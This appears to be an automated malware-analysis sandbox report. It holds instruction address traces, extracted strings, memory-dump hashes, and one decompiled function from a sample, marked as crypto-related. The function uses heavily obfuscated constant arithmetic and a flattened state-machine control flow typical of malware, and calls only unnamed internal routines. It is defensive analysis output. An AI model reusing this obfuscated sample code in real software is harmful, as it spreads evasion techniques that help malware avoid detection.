0x00a6c7ba
0x00a6c7c2
0x00a6c7cc
0x00a6c7cd
0x00a6c7d1
0x00a6c7d9
0x00a6c7e4
0x00a6c7ec
0x00a6c7f4
0x00a6c7ff
0x00a6c80a
0x00a6c812
0x00a6c819
0x00a6c824
0x00a6c82c
0x00a6c834
0x00a6c839
0x00a6c841
0x00a6c849
0x00a6c85c
0x00a6c863
0x00a6c86e
0x00a6c879
0x00a6c884
0x00a6c88f
0x00a6c89a
0x00a6c8b0
0x00a6c8c0
0x00a6c8c5
0x00a6c8ce
0x00a6c8d9
0x00a6c8e1
0x00a6c8e9
0x00a6c8f5
0x00a6c8fa
0x00a6c900
0x00a6c908
0x00a6c913
0x00a6c91b
0x00a6c926
0x00a6c931
0x00a6c93c
0x00a6c947
0x00a6c952
0x00a6c95d
0x00a6c968
0x00a6c973
0x00a6c97e
0x00a6c989
0x00a6c991
0x00a6c999
0x00a6c99e
0x00a6c9a6
0x00a6c9ae
0x00a6c9b9
0x00a6c9c1
0x00a6c9cc
0x00a6c9d7
0x00a6c9de
0x00a6c9e9
0x00a6c9f4
0x00a6c9ff
0x00a6ca0a
0x00a6ca1c
0x00a6ca1f
0x00a6ca26
0x00a6ca31
0x00a6ca44
0x00a6ca4b
0x00a6ca56
0x00a6ca61
0x00a6ca6c
0x00a6ca77
0x00a6ca82
0x00a6ca8d
0x00a6ca98
0x00a6caa5
0x00a6caa9
0x00a6cab1
0x00a6cab6
0x00a6cabe
0x00a6cac9
0x00a6cad4
0x00a6cadc
0x00a6cae7
0x00a6caef
0x00a6cafc
0x00a6cb00
0x00a6cb05
0x00a6cb0d
0x00a6cb15
0x00a6cb1d
0x00a6cb25
0x00a6cb2a
0x00a6cb32
0x00a6cb3d
0x00a6cb4a
0x00a6cb52
0x00a6cb5d
0x00a6cb72
0x00a6cb75
0x00a6cb76
0x00a6cb7d
0x00a6cb88
0x00a6cb9d
0x00a6cba4
0x00a6cbaf
0x00a6cbba
0x00a6cbc5
0x00a6cbd0
0x00a6cbdb
0x00a6cbe3
0x00a6cbeb
0x00a6cbf5
0x00a6cbf9
0x00a6cc01
0x00a6cc0e
0x00a6cc12
0x00a6cc17
0x00a6cc1f
0x00a6cc27
0x00a6cc2f
0x00a6cc34
0x00a6cc41
0x00a6cc45
0x00a6cc4d
0x00a6cc55
0x00a6cc5a
0x00a6cc6a
0x00a6cc6e
0x00a6cc76
0x00a6cc86
0x00a6cc8f
0x00a6cc90
0x00a6cc9a
0x00a6cc9e
0x00a6cca6
0x00a6ccae
0x00a6ccb6
0x00a6ccbe
0x00a6ccc3
0x00a6cccb
0x00a6ccd6
0x00a6cce1
0x00a6ccec
0x00a6ccff
0x00a6cd06
0x00a6cd11
0x00a6cd1c
0x00a6cd27
0x00a6cd32
0x00a6cd3d
0x00a6cd45
0x00a6cd50
0x00a6cd5b
0x00a6cd66
0x00a6cd6e
0x00a6cd79
0x00a6cd86
0x00a6cd8e
0x00a6cd99
0x00a6cda4
0x00a6cdb8
0x00a6cdbd
0x00a6cdc6
0x00a6cdd1
0x00a6cdde
0x00a6cde1
0x00a6cde5
0x00a6cded
0x00a6cdf5
0x00a6cdfd
0x00a6ce05
0x00a6ce0d
0x00a6ce17
0x00a6ce1b
0x00a6ce23
0x00a6ce2b
0x00a6ce33
0x00a6ce3b
0x00a6ce43
0x00a6ce47
0x00a6ce4f
0x00a6ce5a
0x00a6ce6c
0x00a6ce71
0x00a6ce7a
0x00a6ce85
0x00a6ce92
0x00a6ce95
0x00a6ce99
0x00a6cea6
0x00a6ceaa
0x00a6ceb2
0x00a6ceba
0x00a6cebf
0x00a6cec7
0x00a6cecf
0x00a6ced7
0x00a6cee2
0x00a6ceea
0x00a6cef5
0x00a6cf05
0x00a6cf0d
0x00a6cf10
0x00a6cf14
0x00a6cf1c
0x00a6cf24
0x00a6cf37
0x00a6cf3e
0x00a6cf46
0x00a6cf51
0x00a6cf5c
0x00a6cf64
0x00a6cf6f
0x00a6cf7c
0x00a6cf90
0x00a6cf95
0x00a6cf9c
0x00a6cfa7
0x00a6cfb5
0x00a6cfba
0x00a6cfbe
0x00a6cfc9
0x00a6cfce
0x00a6cfd2
0x00a6cfda
0x00a6cfe5
0x00a6cfed
0x00a6cff8
0x00a6d003
0x00a6d00e
0x00a6d019
0x00a6d027
0x00a6d02c
0x00a6d038
0x00a6d03c
0x00a6d044
0x00a6d04c
0x00a6d057
0x00a6d062
0x00a6d06d
0x00a6d078
0x00a6d083
0x00a6d08e
0x00a6d096
0x00a6d0a6
0x00a6d0aa
0x00a6d0af
0x00a6d0b7
0x00a6d0c2
0x00a6d0ca
0x00a6d0d5
0x00a6d0e0
0x00a6d0eb
0x00a6d0f6
0x00a6d101
0x00a6d10c
0x00a6d114
0x00a6d11f
0x00a6d12a
0x00a6d135
0x00a6d140
0x00a6d14b
0x00a6d156
0x00a6d161
0x00a6d16c
0x00a6d177
0x00a6d184
0x00a6d190
0x00a6d195
0x00a6d19b
0x00a6d1a3
0x00a6d1ac
0x00a6d1b1
0x00a6d1b6
0x00a6d1bc
0x00a6d1c4
0x00a6d1d6
0x00a6d1db
0x00a6d1e4
0x00a6d1ec
0x00a6d1f7
0x00a6d1ff
0x00a6d207
0x00a6d20f
0x00a6d217
0x00a6d21f
0x00a6d227
0x00a6d22c
0x00a6d234
0x00a6d23c
0x00a6d244
0x00a6d24c
0x00a6d258
0x00a6d25d
0x00a6d267
0x00a6d26c
0x00a6d272
0x00a6d27a
0x00a6d285
0x00a6d294
0x00a6d297
0x00a6d29e
0x00a6d2a9
0x00a6d2a9
0x00a6d2a9
0x00a6d2ae
0x00a6d2ae
0x00a6d2ae
0x00a6d2b3
0x00a6d2b3
0x00a6d2b3
0x00a6d2b3
0x00a6d2b9
0x00000000
0x00000000
0x00a6d2bf
0x00a6d48f
0x00a6d496
0x00a6d2a9
0x00a6d2a9
0x00a6d2a9
0x00a6d2ae
0x00a6d2ae
0x00000000
0x00a6d2ae
0x00a6d2a9
0x00a6d2c7
0x00a6d462
0x00a6d469
0x00a6d2a9
0x00a6d2a9
0x00a6d2a9
0x00000000
0x00a6d2a9
0x00a6d2a9
0x00a6d2cf
0x00a6d435
0x00a6d43c
0x00a6d442
0x00a6d444
0x00a6d2a9
0x00a6d2a9
0x00a6d2a9
0x00000000
0x00a6d2a9
0x00a6d2a9
0x00a6d2db
0x00a6d40e
0x00a6d41a
0x00a6d41d
0x00a6d421
0x00a6d426
0x00000000
0x00a6d426
0x00a6d2e7
0x00a6d359
0x00a6d35e
0x00a6d3bc
0x00a6d3d2
0x00a6d3d9
0x00a6d3de
0x00a6d3e1
0x00a6d3e1
0x00a6d715
0x00a6d715
0x00a6d71a
0x00000000
0x00a6d71a
0x00a6d2ef
0x00a6d33f
0x00000000
0x00a6d33f
0x00a6d2f3
0x00000000
0x00000000
0x00a6d328
0x00a6d32d
0x00a6d337
0x00a6d2a9
0x00a6d2a9
0x00a6d2a9
0x00000000
0x00a6d2a9
0x00a6d2a9
0x00a6d4a2
0x00a6d4a4
0x00a6d6c7
0x00a6d6f5
0x00a6d6fa
0x00a6d6fd
0x00a6d704
0x00a6d710
0x00000000
0x00a6d710
0x00a6d706
0x00a6d2a9
0x00a6d2a9
0x00a6d2a9
0x00000000
0x00a6d2a9
0x00a6d2a9
0x00a6d4aa
0x00a6d4b0
0x00a6d6ab
0x00a6d6b2
0x00000000
0x00a6d6b2
0x00a6d4b6
0x00a6d4bc
0x00a6d5e0
0x00a6d5e5
0x00a6d5fa
0x00a6d645
0x00a6d65b
0x00a6d665
0x00a6d680
0x00a6d685
0x00a6d688
0x00000000
0x00a6d688
0x00a6d4c2
0x00a6d4c4
0x00a6d512
0x00a6d517
0x00a6d51f
0x00a6d527
0x00a6d529
0x00a6d568
0x00a6d56d
0x00a6d570
0x00a6d577
0x00a6d5b7
0x00a6d579
0x00a6d579
0x00a6d587
0x00a6d58e
0x00a6d595
0x00a6d5a4
0x00a6d5a7
0x00a6d5a8
0x00a6d5ad
0x00a6d5b0
0x00a6d5b0
0x00a6d5c9
0x00000000
0x00a6d5cf
0x00a6d4c6
0x00a6d4cc
0x00000000
0x00000000
0x00a6d4f2
0x00a6d4fc
0x00a6d506
0x00a6d71f
0x00a6d71f
0x00a6d71f
0x00000000
0x00a6d72b
0x00a6d2ae

Strings

g, xrefs: 00A6CC9E
~Y, xrefs: 00A6CD1C
RN, xrefs: 00A6D688
D1, xrefs: 00A6D062
dV, xrefs: 00A6CDED
K8zQ, xrefs: 00A6CECF
w:", xrefs: 00A6CD32
YB, xrefs: 00A6D0EB
9K, xrefs: 00A6C80A
U, xrefs: 00A6D03C
RN, xrefs: 00A6D1A3
oaj, xrefs: 00A6CE3B
hcuU, xrefs: 00A6D234
]^, xrefs: 00A6CD6E
H, xrefs: 00A6CDC6
eCf, xrefs: 00A6CE1B

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 9K$D1$K8zQ$YB$]^$dV$eCf$g$hcuU$oaj$w:"$~Y$H$RN$RN$U
API String ID: 0-3730166627
Opcode ID: 6dfcfd5aaaeb899db3ad7b5d4d2f2aa11f0d974043a3b8a1cee0890375da5ecd
Instruction ID: 1c65d2b077f8e882ee207bc80db00dfe36caa1e4183f8e030d4920405f7e05ac
Opcode Fuzzy Hash: 6dfcfd5aaaeb899db3ad7b5d4d2f2aa11f0d974043a3b8a1cee0890375da5ecd
Instruction Fuzzy Hash: 29820F716083818FD378CF25C98AB9BBBE2BBC5344F10891DE5D996260DBB19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A71C12, Relevance: 20.6, Strings: 16, Instructions: 644
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00A71C12(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				char _v2624;
				intOrPtr _v2628;
				char _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				unsigned int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t755;
				void* _t756;
				short* _t766;
				signed int _t773;
				signed int _t779;
				signed int _t788;
				void* _t791;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				void* _t812;
				signed int _t877;
				void* _t882;
				signed int* _t883;
				signed int* _t884;
				void* _t887;

				_t883 =  &_v2932;
				_v2608 = _v2608 & 0x00000000;
				_v2612 = 0xa3d4eb;
				_v2660 = 0x6758cb;
				_v2660 = _v2660 << 4;
				_v2660 = _v2660 ^ 0x06758c99;
				_v2732 = 0xdc8525;
				_v2732 = _v2732 | 0x3ff23f5d;
				_v2732 = _v2732 ^ 0x3feebf7d;
				_v2928 = 0xfbcda8;
				_v2928 = _v2928 | 0x9eb5e9b7;
				_v2928 = _v2928 + 0xffff6f36;
				_v2928 = _v2928 + 0xffffec33;
				_v2928 = _v2928 ^ 0x9ef08d4a;
				_v2756 = 0xde70d9;
				_t882 = __ecx;
				_t877 = 0x99d8a48;
				_t793 = 0x28;
				_v2756 = _v2756 / _t793;
				_v2756 = _v2756 | 0x7728469f;
				_v2756 = _v2756 ^ 0x772920e1;
				_v2900 = 0xe4279b;
				_v2900 = _v2900 >> 0xc;
				_v2900 = _v2900 * 0x68;
				_v2900 = _v2900 + 0xffff73cc;
				_v2900 = _v2900 ^ 0x000006fc;
				_v2688 = 0xa4ffcb;
				_v2688 = _v2688 + 0xffff5cd6;
				_v2688 = _v2688 ^ 0x00a04a41;
				_v2908 = 0xc9c6ce;
				_v2908 = _v2908 | 0xf5fbf83a;
				_v2908 = _v2908 + 0x7e10;
				_v2908 = _v2908 / _t793;
				_v2908 = _v2908 ^ 0x062c0b4a;
				_v2916 = 0x7f9442;
				_v2916 = _v2916 << 0xb;
				_v2916 = _v2916 ^ 0x8520fee0;
				_v2916 = _v2916 + 0xe609;
				_v2916 = _v2916 ^ 0x798f337b;
				_v2652 = 0x9f68d1;
				_t794 = 0x4e;
				_v2652 = _v2652 * 0x2e;
				_v2652 = _v2652 ^ 0x1cad1c96;
				_v2680 = 0x874387;
				_v2680 = _v2680 / _t794;
				_v2680 = _v2680 ^ 0x000eef56;
				_v2740 = 0x218d86;
				_v2740 = _v2740 ^ 0x8da9a7ec;
				_v2740 = _v2740 + 0xffff8c18;
				_v2740 = _v2740 ^ 0x8d8801a5;
				_v2780 = 0xd8f554;
				_v2780 = _v2780 >> 0xb;
				_v2780 = _v2780 >> 7;
				_v2780 = _v2780 ^ 0x00079072;
				_v2892 = 0x1ce380;
				_v2892 = _v2892 ^ 0x506392b2;
				_v2892 = _v2892 >> 2;
				_v2892 = _v2892 ^ 0xa7f562ec;
				_v2892 = _v2892 ^ 0xb3eeada2;
				_v2748 = 0x4b6045;
				_v2748 = _v2748 | 0xfff2b3bd;
				_v2748 = _v2748 ^ 0xfffe78ab;
				_v2772 = 0x44b019;
				_v2772 = _v2772 << 6;
				_v2772 = _v2772 ^ 0xdf8519b0;
				_v2772 = _v2772 ^ 0xcea55934;
				_v2672 = 0x9de851;
				_v2672 = _v2672 + 0xdaae;
				_v2672 = _v2672 ^ 0x009a5a0c;
				_v2816 = 0xce234;
				_v2816 = _v2816 ^ 0xef3b6bc0;
				_v2816 = _v2816 + 0xb943;
				_v2816 = _v2816 ^ 0xef313dc6;
				_v2644 = 0x831e64;
				_v2644 = _v2644 << 7;
				_v2644 = _v2644 ^ 0x418cd6ce;
				_v2792 = 0xb71d5;
				_v2792 = _v2792 + 0xd0e6;
				_v2792 = _v2792 >> 1;
				_v2792 = _v2792 ^ 0x000ab854;
				_v2800 = 0xbc4add;
				_v2800 = _v2800 >> 4;
				_v2800 = _v2800 >> 4;
				_v2800 = _v2800 ^ 0x000f3ccc;
				_v2860 = 0xc7de55;
				_v2860 = _v2860 >> 8;
				_v2860 = _v2860 >> 3;
				_v2860 = _v2860 + 0xffffb96d;
				_v2860 = _v2860 ^ 0xfff9a10f;
				_v2868 = 0x50e0;
				_v2868 = _v2868 << 0x10;
				_v2868 = _v2868 ^ 0x31c9bada;
				_v2868 = _v2868 << 3;
				_v2868 = _v2868 ^ 0x0945daeb;
				_v2876 = 0x5f8cf7;
				_v2876 = _v2876 ^ 0xc877f21d;
				_v2876 = _v2876 + 0x5049;
				_v2876 = _v2876 ^ 0xb9ce624b;
				_v2876 = _v2876 ^ 0x71e38bc3;
				_v2884 = 0xd45199;
				_v2884 = _v2884 + 0x1b0f;
				_v2884 = _v2884 ^ 0x78878a0d;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 ^ 0x0002122d;
				_v2784 = 0xb41ca7;
				_v2784 = _v2784 >> 6;
				_v2784 = _v2784 << 5;
				_v2784 = _v2784 ^ 0x005b868a;
				_v2636 = 0x8dae72;
				_v2636 = _v2636 + 0xffffc621;
				_v2636 = _v2636 ^ 0x008635a7;
				_v2664 = 0x1c5bb7;
				_v2664 = _v2664 + 0x2d8a;
				_v2664 = _v2664 ^ 0x0011f5d8;
				_v2760 = 0x485545;
				_t204 =  &_v2760; // 0x485545
				_t795 = 0x2b;
				_v2760 =  *_t204 / _t795;
				_t210 =  &_v2760; // 0x772920e1
				_t796 = 0x33;
				_v2760 =  *_t210 / _t796;
				_v2760 = _v2760 ^ 0x0005bb0a;
				_v2768 = 0x206724;
				_v2768 = _v2768 + 0xbd1f;
				_t797 = 0x66;
				_v2768 = _v2768 * 0x7b;
				_v2768 = _v2768 ^ 0x0fe22bc5;
				_v2776 = 0x718f5a;
				_v2776 = _v2776 * 0x3f;
				_v2776 = _v2776 ^ 0xe004a3c2;
				_v2776 = _v2776 ^ 0xfbf0dedb;
				_v2852 = 0x30668;
				_v2852 = _v2852 / _t797;
				_v2852 = _v2852 * 0x79;
				_t798 = 0x34;
				_v2852 = _v2852 * 0x41;
				_v2852 = _v2852 ^ 0x00e90d43;
				_v2880 = 0xddde8d;
				_v2880 = _v2880 + 0xffff9e4d;
				_v2880 = _v2880 ^ 0x2170423a;
				_v2880 = _v2880 >> 1;
				_v2880 = _v2880 ^ 0x10d47b31;
				_v2764 = 0x8f88ee;
				_v2764 = _v2764 + 0xffff0386;
				_v2764 = _v2764 * 0x4a;
				_v2764 = _v2764 ^ 0x293e38ba;
				_v2932 = 0x1330a6;
				_v2932 = _v2932 << 0x10;
				_v2932 = _v2932 ^ 0x26950d85;
				_v2932 = _v2932 | 0xf53ba417;
				_v2932 = _v2932 ^ 0xf73491db;
				_v2848 = 0x8b68d8;
				_v2848 = _v2848 + 0xffffc5d2;
				_v2848 = _v2848 / _t798;
				_t799 = 0x44;
				_v2848 = _v2848 * 0x12;
				_v2848 = _v2848 ^ 0x00302441;
				_v2796 = 0x487ac0;
				_v2796 = _v2796 >> 2;
				_v2796 = _v2796 << 2;
				_v2796 = _v2796 ^ 0x0044512a;
				_v2788 = 0x814d4e;
				_v2788 = _v2788 << 0xd;
				_v2788 = _v2788 + 0xffffeb04;
				_v2788 = _v2788 ^ 0x29afe2cb;
				_v2648 = 0x81f400;
				_v2648 = _v2648 / _t799;
				_v2648 = _v2648 ^ 0x0007d40f;
				_v2924 = 0x344f86;
				_v2924 = _v2924 * 0x6e;
				_v2924 = _v2924 | 0xa7e46eb9;
				_v2924 = _v2924 << 7;
				_v2924 = _v2924 ^ 0xff3431be;
				_v2696 = 0x5309a4;
				_v2696 = _v2696 + 0xabda;
				_v2696 = _v2696 ^ 0x0057eeeb;
				_v2640 = 0xcd8354;
				_v2640 = _v2640 * 0x30;
				_v2640 = _v2640 ^ 0x268d1ae3;
				_v2736 = 0x8b4c85;
				_v2736 = _v2736 + 0xffffcdbf;
				_v2736 = _v2736 >> 9;
				_v2736 = _v2736 ^ 0x00036e60;
				_v2700 = 0x49adfc;
				_v2700 = _v2700 | 0xa8ad8379;
				_v2700 = _v2700 ^ 0xa8e07f1f;
				_v2836 = 0x26ed3a;
				_v2836 = _v2836 << 4;
				_v2836 = _v2836 ^ 0xdd500379;
				_v2836 = _v2836 ^ 0x075ca1f5;
				_v2836 = _v2836 ^ 0xd8654197;
				_v2864 = 0x88b41;
				_v2864 = _v2864 ^ 0x8a41e3e3;
				_v2864 = _v2864 << 2;
				_v2864 = _v2864 * 0x3d;
				_v2864 = _v2864 ^ 0xcdf16822;
				_v2712 = 0x130ad6;
				_v2712 = _v2712 + 0x26b0;
				_v2712 = _v2712 ^ 0x001463fa;
				_v2912 = 0xf18913;
				_t800 = 0x60;
				_v2912 = _v2912 / _t800;
				_v2912 = _v2912 ^ 0xfb8d6542;
				_v2912 = _v2912 ^ 0x1ef95146;
				_v2912 = _v2912 ^ 0xe575fcb3;
				_v2832 = 0xd4991f;
				_v2832 = _v2832 >> 1;
				_t801 = 0x19;
				_v2832 = _v2832 * 0x39;
				_v2832 = _v2832 + 0x6431;
				_v2832 = _v2832 ^ 0x17a3d9f5;
				_v2840 = 0x943911;
				_v2840 = _v2840 ^ 0xe2670b6e;
				_v2840 = _v2840 + 0x24d4;
				_v2840 = _v2840 << 0xd;
				_v2840 = _v2840 ^ 0x6aeb880a;
				_v2904 = 0xa538e8;
				_v2904 = _v2904 >> 0xc;
				_v2904 = _v2904 ^ 0x62edf37a;
				_v2904 = _v2904 + 0xa832;
				_v2904 = _v2904 ^ 0x62e4cbfc;
				_v2888 = 0x16e2bd;
				_v2888 = _v2888 + 0xffff7f28;
				_v2888 = _v2888 * 0x64;
				_v2888 = _v2888 >> 7;
				_v2888 = _v2888 ^ 0x0018f901;
				_v2656 = 0x3f6e99;
				_v2656 = _v2656 >> 0xb;
				_v2656 = _v2656 ^ 0x0009fe52;
				_v2804 = 0xfa19bd;
				_v2804 = _v2804 / _t801;
				_v2804 = _v2804 << 0xa;
				_v2804 = _v2804 ^ 0x28048f08;
				_v2856 = 0x7adc8b;
				_t802 = 3;
				_v2856 = _v2856 / _t802;
				_v2856 = _v2856 << 0xe;
				_v2856 = _v2856 << 9;
				_v2856 = _v2856 ^ 0x17040ca6;
				_v2896 = 0x5caea7;
				_t803 = 0x48;
				_v2896 = _v2896 / _t803;
				_v2896 = _v2896 + 0xffff6657;
				_v2896 = _v2896 + 0xa67d;
				_v2896 = _v2896 ^ 0x000329ba;
				_v2812 = 0x1fcfbe;
				_v2812 = _v2812 >> 6;
				_t804 = 0x38;
				_v2812 = _v2812 / _t804;
				_v2812 = _v2812 ^ 0x0007b63c;
				_v2720 = 0xe95658;
				_v2720 = _v2720 >> 7;
				_v2720 = _v2720 ^ 0x00071478;
				_v2808 = 0x91ff61;
				_v2808 = _v2808 << 7;
				_v2808 = _v2808 | 0xd2954662;
				_v2808 = _v2808 ^ 0xdaf4ea8a;
				_v2824 = 0x446ad6;
				_v2824 = _v2824 ^ 0x83a91402;
				_t805 = 0x4c;
				_v2824 = _v2824 * 0x45;
				_v2824 = _v2824 >> 0x10;
				_v2824 = _v2824 ^ 0x000353dc;
				_v2708 = 0x4b7422;
				_v2708 = _v2708 >> 3;
				_v2708 = _v2708 ^ 0x0008e5f0;
				_v2844 = 0xac34a;
				_v2844 = _v2844 * 0xd;
				_v2844 = _v2844 * 0x1a;
				_v2844 = _v2844 >> 0x10;
				_v2844 = _v2844 ^ 0x0002a3d0;
				_v2716 = 0x7960bf;
				_v2716 = _v2716 + 0xffffc462;
				_v2716 = _v2716 ^ 0x007665d3;
				_v2744 = 0xbebd75;
				_v2744 = _v2744 ^ 0x7a1f8fc9;
				_v2744 = _v2744 / _t805;
				_v2744 = _v2744 ^ 0x0198bdde;
				_v2752 = 0x962c9a;
				_v2752 = _v2752 + 0xfffffa67;
				_t806 = 0x2e;
				_v2752 = _v2752 / _t806;
				_v2752 = _v2752 ^ 0x00030d52;
				_v2920 = 0x9dfed8;
				_v2920 = _v2920 ^ 0x0302cebd;
				_v2920 = _v2920 + 0x73d2;
				_v2920 = _v2920 >> 0xf;
				_v2920 = _v2920 ^ 0x000ba8ee;
				_v2872 = 0x884e2b;
				_v2872 = _v2872 | 0x5783eec3;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 + 0x1dcf;
				_v2872 = _v2872 ^ 0xc5fa8f40;
				_v2668 = 0x393d56;
				_v2668 = _v2668 >> 6;
				_v2668 = _v2668 ^ 0x0000ab92;
				_v2704 = 0x58f1e9;
				_t807 = 0x7c;
				_v2704 = _v2704 / _t807;
				_v2704 = _v2704 ^ 0x00048cf6;
				_v2820 = 0x3ec6d0;
				_v2820 = _v2820 + 0x5fc5;
				_t808 = 0x21;
				_v2820 = _v2820 / _t808;
				_v2820 = _v2820 ^ 0xd86d8e19;
				_v2820 = _v2820 ^ 0xd8634d78;
				_v2828 = 0xe4a70b;
				_v2828 = _v2828 ^ 0x2abc0881;
				_v2828 = _v2828 ^ 0xa79f6464;
				_v2828 = _v2828 >> 0xf;
				_v2828 = _v2828 ^ 0x000c3a60;
				_v2684 = 0x315a2d;
				_v2684 = _v2684 | 0xacf80d9c;
				_v2684 = _v2684 ^ 0xacfa1597;
				_v2692 = 0x63e424;
				_v2692 = _v2692 + 0x44ad;
				_v2692 = _v2692 ^ 0x0068b9d0;
				_v2724 = 0xdbaa4f;
				_v2724 = _v2724 + 0xffffd825;
				_v2724 = _v2724 ^ 0x00d800e8;
				_v2728 = 0xc5e7f7;
				_v2728 = _v2728 << 0xf;
				_v2728 = _v2728 << 0xd;
				_v2728 = _v2728 ^ 0x7003c940;
				_v2676 = 0x7098dc;
				_v2676 = _v2676 ^ 0x810ef473;
				_v2676 = _v2676 ^ 0x817bc99c;
				_t755 = E00A6ADFC();
				_t876 = _v2724;
				_t791 = _t755;
				while(1) {
					L1:
					_t756 = 0x32a72b9;
					do {
						while(1) {
							L2:
							_t887 = _t877 - 0x99d8a48;
							if(_t887 > 0) {
								break;
							}
							if(_t887 == 0) {
								_push(_t809);
								_t809 = _v2756;
								E00A6E259(_t809, _v2660, _v2900, _v2688, _t809, _t809,  &_v1564, _v2908, _v2916);
								_t883 =  &(_t883[8]);
								_t877 = 0xe471d7b;
								while(1) {
									L1:
									_t756 = 0x32a72b9;
									goto L2;
								}
							} else {
								if(_t877 == 0xe4882e) {
									_v2620 = E00A63789();
									_t779 = E00A6F14F(_v2932, _t778, _v2848, _v2796);
									_pop(_t812);
									_v2616 = 2 + _t779 * 2;
									_t809 = _v2788;
									_t773 = E00A78727(_t809,  &_v2624, _v2648, _t791, _v2924, _v2732, _v2696, _t791, _t812, _t791, _v2640);
									_t883 =  &(_t883[0xa]);
									__eflags = _t773;
									if(__eflags != 0) {
										_t877 = 0xc8e8e82;
										while(1) {
											L1:
											_t756 = 0x32a72b9;
											goto L2;
										}
									}
								} else {
									if(_t877 == _t756) {
										_push(0xa612a0);
										E00A68C65(_v2888, __eflags,  &_v2604,  &_v1564, _v2656, _t876, _v2804, E00A80AD3(_v2840, _v2904, __eflags), _v2856,  &_v524, _v2896, _v2812);
										_t809 = _v2720;
										E00A72EED(_t809, _v2808, _v2824, _t782);
										_t883 =  &(_t883[0xc]);
										_t877 = 0xca1945b;
										while(1) {
											L1:
											_t756 = 0x32a72b9;
											goto L2;
										}
									} else {
										if(_t877 == 0x3352d63) {
											_t809 = _v2864;
											_t788 = E00A67739(_t809, _v2712, _v2632, _v2912, _v2628, _v2832);
											_t876 = _t788;
											_t883 =  &(_t883[4]);
											__eflags = _t788;
											_t756 = 0x32a72b9;
											_t877 =  !=  ? 0x32a72b9 : 0xc5894d6;
											continue;
										} else {
											if(_t877 == 0x5779399) {
												return E00A79038(_v2724, _v2728, _v2624, _v2676);
											}
											if(_t877 != 0x58d7aaf) {
												goto L24;
											} else {
												_t809 = _v2920;
												E00A6F699(_t809, _t876, _v2872, _v2668, _v2704);
												_t883 =  &(_t883[3]);
												_t877 = 0xc5894d6;
												while(1) {
													L1:
													_t756 = 0x32a72b9;
													goto L2;
												}
											}
										}
									}
									L28:
								}
							}
							L27:
							return _t773;
							goto L28;
						}
						__eflags = _t877 - 0xc5894d6;
						if(_t877 == 0xc5894d6) {
							_t809 = _v2820;
							E00A6F699(_t809, _v2632, _v2828, _v2684, _v2692);
							_t883 =  &(_t883[3]);
							_t877 = 0x5779399;
							_t756 = 0x32a72b9;
							goto L24;
						} else {
							__eflags = _t877 - 0xc8e8e82;
							if(_t877 == 0xc8e8e82) {
								_t809 = _v2736;
								E00A77EDD( &_v2624, _v2700,  &_v2632, _v2836);
								_t883 =  &(_t883[3]);
								asm("sbb esi, esi");
								_t877 = (_t877 & 0xfdbd99ca) + 0x5779399;
								goto L1;
							} else {
								__eflags = _t877 - 0xca1945b;
								if(__eflags == 0) {
									_push(_v2752);
									_push( &_v524);
									_push(0);
									_push(_v2744);
									_push(_v2716);
									_push(_v2844);
									_push(1);
									_push(0);
									E00A806EF(_v2708, __eflags);
									_t883 =  &(_t883[8]);
									_t877 = 0x58d7aaf;
									while(1) {
										L1:
										_t756 = 0x32a72b9;
										goto L2;
									}
								} else {
									__eflags = _t877 - 0xe471d7b;
									if(__eflags != 0) {
										goto L24;
									} else {
										E00A624AA(_t809, _v2652, __eflags,  &_v2084, _v2680, _v2740, _v2780);
										_t766 = E00A70F17(_v2892, _v2748,  &_v2084, _v2772, _v2672);
										_t884 =  &(_t883[7]);
										 *_t766 = 0;
										E00A7CC3F(_v2816,  &_v1044, __eflags, _v2644);
										 *_t884 = 0xa611b0;
										E00A806A6(__eflags,  &_v2084, _v2860, E00A80AD3(_v2792, _v2800, __eflags), _v2868, _v2876,  &_v2604, _v2884);
										E00A72EED(_v2784, _v2636, _v2664, _t768);
										_t809 =  &_v2604;
										_t773 = E00A83306(_t809, _v2760, _v2768, _v2776, _t882, _v2852);
										_t883 =  &(_t884[0xd]);
										__eflags = _t773;
										if(__eflags != 0) {
											_t877 = 0xe4882e;
											while(1) {
												L1:
												_t756 = 0x32a72b9;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t877 - 0x51bfa3f;
					} while (__eflags != 0);
					return _t756;
				}
			}

0x00a71c12
0x00a71c18
0x00a71c22
